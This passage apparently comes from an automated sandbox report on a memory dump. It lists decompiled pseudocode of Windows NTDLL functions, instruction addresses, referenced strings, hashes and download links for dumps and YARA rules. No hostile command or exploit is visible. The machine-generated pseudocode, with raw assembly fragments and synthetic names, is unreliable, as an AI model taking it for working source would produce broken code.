				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04BBDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04BBD130(_t34, _t39, _t40);
			}

0x04c18df1
0x04c18df1
0x04c18df1
0x04c18df1
0x04c18df1
0x04c18df1
0x04c18df3
0x04c18df8
0x04c18dfd
0x04c18e00
0x04c18e0e
0x04c18e2a
0x04c18e36
0x04c18e38
0x04c18e3c
0x04c18e46
0x04c18e46
0x04c18e36
0x04c18e50
0x04c18e56
0x04c18e59
0x04c18e5c
0x04c18e60
0x04c18e67
0x04c18e6d
0x04c18e73
0x04c18e74
0x04c18eb1
0x04c18ebd

Strings

Critical error detected %lx, xrefs: 04C18E21

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5b0fcb4865e304f94fd35efa3bd1275a52b33d452587718efc4523c640213c7e
Instruction ID: 71c5685de809eeb106a1313c3490546cf23f4344da261863a6d045d687bb1600
Opcode Fuzzy Hash: 5b0fcb4865e304f94fd35efa3bd1275a52b33d452587718efc4523c640213c7e
Instruction Fuzzy Hash: F411CE75D04308DBEF24DFA489057ECBBB5BF05314F20426DD158AB2A1C3742602DF14

Uniqueness

Uniqueness Score: -1.00%

Function 04BFFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04BFFF60

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 17ecc73f62e50f42335ef37bd885ecdc269486cb03d34efd1e4e6822de1a078a
Instruction ID: 999ac8ae627427854bfedb83a5b2e5d27cac407c75b92deb44f3b181ee70dbd9
Opcode Fuzzy Hash: 17ecc73f62e50f42335ef37bd885ecdc269486cb03d34efd1e4e6822de1a078a
Instruction Fuzzy Hash: 2611AD75951644EFEB26EB50CD48FACBBB2FB08718F1480D4E6086B2A1C779B984DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04C35BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04C35BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4c41178);
				E04BBD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04C34C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04BAD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04C35542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4c560e8;
								if( *0x4c560e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4c560e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04BA9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04BA6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04BAF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04BAF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04BAF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04BAFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04BAFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04BAF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04BAF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04C34CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04BBD130(_t427, _t494, _t511);
				}
			}

0x04c35ba5
0x04c35baa
0x04c35baf
0x04c35bb4
0x04c35bb6
0x04c35bbc
0x04c35bbe
0x04c35bc4
0x04c35bcd
0x04c35bd3
0x04c35bd6
0x04c35bdc
0x04c35be0
0x04c35be3
0x04c35beb
0x04c35bf2
0x04c35bf8
0x04c35bfe
0x04c35c04
0x04c35c0e
0x04c35c18
0x04c35c1f
0x04c35c25
0x04c35c2a
0x04c35c2c
0x04c35c32
0x04c35c3a
0x04c35c3f
0x04c35c42
0x04c35c48
0x04c35c5b
0x04c35c5b
0x04c35c2c
0x04c35cb7
0x04c35cb9
0x04c35cbf
0x04c35cc2
0x04c35cca
0x04c35ccb
0x04c35ccb
0x04c35cd1
0x04c35cd7
0x04c35cda
0x04c35ce1
0x04c35ce4
0x04c35ce7
0x04c35ced
0x04c35cf3
0x04c35cf9
0x04c35cff
0x04c35d08
0x04c35d0a
0x04c35d0e
0x04c35d10
0x00000000
0x00000000
0x04c35d16
0x04c35d1a
0x00000000
0x00000000
0x04c35d20
0x04c35d22
0x04c35d25
0x04c35d2f
0x04c35d2f
0x04c35d33
0x04c35d3d
0x04c35d49
0x04c35d4b
0x00000000
0x00000000
0x04c35d5a
0x04c35d5d
0x04c35d60
0x00000000
0x00000000
0x04c35d66
0x04c35d69
0x00000000
0x00000000
0x04c35d6f
0x04c35d6f
0x04c35d73
0x04c35d79
0x04c35d7f
0x04c35d86
0x04c35d95
0x04c35d98
0x04c35dba
0x04c35dcb
0x04c35dce
0x04c35dd3
0x04c35dd6
0x04c35dd8
0x04c35de6
0x04c35dec
0x04c35dee
0x04c35df1
0x04c35df3
0x04c3635a
0x04c3635a
0x00000000
0x04c3635a
0x04c35dfe
0x04c35e02
0x04c35e05
0x04c35e07
0x04c35e10
0x04c35e13
0x04c35e1b
0x04c35e1c
0x04c35e21
0x04c35e22
0x04c35e23
0x04c35e25
0x04c35e2a
0x04c35e2c
0x04c35e2e
0x04c35e36
0x04c35e39
0x04c35e42
0x04c35e47
0x04c35e4d
0x04c35e54
0x04c35e54
0x04c35e54
0x04c35e2e
0x04c35e5c
0x04c35e5f
0x04c35e62
0x04c35e64
0x04c35e6b
0x04c35e70
0x04c35e7a
0x04c35e7a
0x04c35e7a
0x04c35e6b
0x04c35e7e
0x04c35e7f
0x04c35e7f
0x04c35e81
0x04c35e87
0x04c35e8b
0x04c35e8c
0x04c35e8c
0x04c35e8c
0x04c35e9a
0x04c35e9c
0x04c35ea2
0x04c35ea6
0x04c35f50
0x04c35f50
0x04c35f57
0x04c35f66
0x04c35f66
0x04c35f66
0x04c35f68
0x04c35f6a
0x04c363d0
0x00000000
0x04c35f70
0x04c35f70
0x04c35f91
0x04c35f9c
0x04c35f9e
0x04c35fa4
0x04c35fa6
0x04c3638c
0x04c36392
0x04c363a1
0x04c363a7
0x04c363af
0x04c363af
0x04c363bd
0x04c363d8
0x00000000
0x04c363d8
0x04c35fac
0x04c35fb2
0x04c35fb4
0x04c35fbd
0x04c35fc6
0x04c35fce
0x04c35fd4
0x04c35fdc
0x04c35fec
0x04c35fed
0x04c35fee
0x04c35fef
0x04c35ff9
0x04c35ffa
0x04c35ffb
0x04c35ffc
0x04c36000
0x04c36004
0x04c36012
0x04c36012
0x04c36018
0x04c36019
0x04c3601a
0x04c3601b
0x04c3601c
0x04c36020
0x04c36059
0x04c3605c
0x04c36061
0x04c36061
0x04c36022
0x04c36022
0x04c36022
0x04c36025
0x04c3602a
0x04c3602b
0x04c36031
0x04c36037
0x04c36038
0x04c3603e
0x04c36048
0x04c36049
0x04c3604a
0x04c3604b
0x04c3604c
0x04c3604d
0x04c36053
0x04c36054
0x04c36054
0x04c36062
0x04c36065
0x04c36067
0x04c3606a
0x04c36070
0x04c36075
0x04c36076
0x04c36081
0x04c36087
0x04c36095
0x04c36099
0x04c3609e
0x04c360a4
0x04c360ae
0x04c360b0
0x04c360b3
0x04c360b6
0x04c360b8
0x04c360ba
0x04c360ba
0x04c360ba
0x04c360ba
0x04c360be
0x04c360c0
0x04c360c5
0x04c360c5
0x04c360c5
0x04c360c6
0x04c360cd
0x04c36114
0x04c360cf
0x04c360cf
0x04c360d4
0x04c360d5
0x04c360da
0x04c360db
0x04c360e1
0x04c360e2
0x04c360e8
0x04c360f8
0x04c360fd
0x04c360fe
0x04c36102
0x04c36104
0x04c36107
0x04c36109
0x04c3610b
0x04c3610b
0x04c3610b
0x04c3610b
0x04c3610f
0x04c3610f
0x04c36117
0x04c3611a
0x04c3611f
0x04c36125
0x04c36134
0x04c36139
0x04c3613f
0x04c36146
0x04c36148
0x04c3614b
0x04c3614d
0x04c3614f
0x04c3614f
0x04c3614f
0x04c3614f
0x04c36153
0x04c36159
0x04c36159
0x04c3615c
0x04c36163
0x04c36169
0x04c3616c
0x04c36172
0x04c36181
0x04c36186
0x04c36187
0x04c3618b
0x04c36191
0x04c36195
0x04c361a3
0x04c361bb
0x04c361c0
0x04c361c3
0x04c361cc
0x04c361d0
0x04c361dc
0x04c361de
0x04c361e1
0x04c361e4
0x04c361e6
0x04c361e8
0x04c361e8
0x04c361e8
0x04c361e8
0x04c361e6
0x04c361ec
0x04c361f3
0x04c36203
0x04c36209
0x04c3620a
0x04c36216
0x04c3621d
0x04c36227
0x04c36241
0x04c36246
0x04c3624c
0x04c36257
0x04c36259
0x04c3625c
0x04c3625e
0x04c36260
0x04c36260
0x04c36260
0x04c36260
0x04c3625e
0x04c36264
0x04c36267
0x04c36269
0x04c36315
0x04c36315
0x04c3631b
0x04c3631e
0x04c36324
0x04c36327
0x04c3632f
0x04c36330
0x04c36333
0x04c3633a
0x04c3633c
0x04c36335
0x04c36335
0x04c36335
0x04c3633f
0x04c36342
0x04c3634c
0x04c36352
0x04c36355
0x04c36355
0x04c36359
0x00000000
0x04c3626f
0x04c36275
0x04c36275
0x04c36278
0x04c3627e
0x04c3627e
0x04c36281
0x04c36287
0x04c3628d
0x04c36298
0x04c3629c
0x04c362a2
0x04c3629e
0x04c3629e
0x04c3629e
0x04c362a7
0x04c362a7
0x04c362aa
0x04c362b0
0x04c362f0
0x04c362f0
0x04c362f2
0x04c362f8
0x04c362fd
0x04c362b2
0x04c362b2
0x04c362b2
0x04c362b5
0x04c362dd
0x04c362e2
0x04c362e5
0x04c362b7
0x04c362b8
0x04c362bb
0x04c362bd
0x04c362c0
0x04c362c4
0x04c362cd
0x04c362cd
0x04c362c0
0x04c362bb
0x04c362b5
0x04c36302
0x04c36303
0x04c36305
0x04c36305
0x04c36305
0x04c3630c
0x04c3630c
0x00000000
0x04c3627e
0x04c36269
0x04c35eac
0x04c35ebb
0x04c35ebe
0x04c35ecb
0x04c35ecb
0x04c35ece
0x04c35ece
0x04c35ed4
0x04c35ed7
0x04c35ed9
0x04c35edb
0x04c35edb
0x04c35ee1
0x04c35ee1
0x04c35ee3
0x04c35f20
0x04c35f20
0x04c35ee5
0x04c35ee5
0x04c35ee5
0x04c35ee8
0x04c35f11
0x04c35f18
0x04c35eea
0x04c35eea
0x04c35eed
0x04c35ef2
0x04c35ef8
0x04c35efb
0x04c35f0a
0x04c35f0a
0x04c35eed
0x04c35ee8
0x04c35f22
0x04c35f28
0x00000000
0x00000000
0x04c35f30
0x04c35f31
0x04c35f37
0x04c35f3a
0x04c35f3d
0x04c35f44
0x00000000
0x00000000
0x00000000
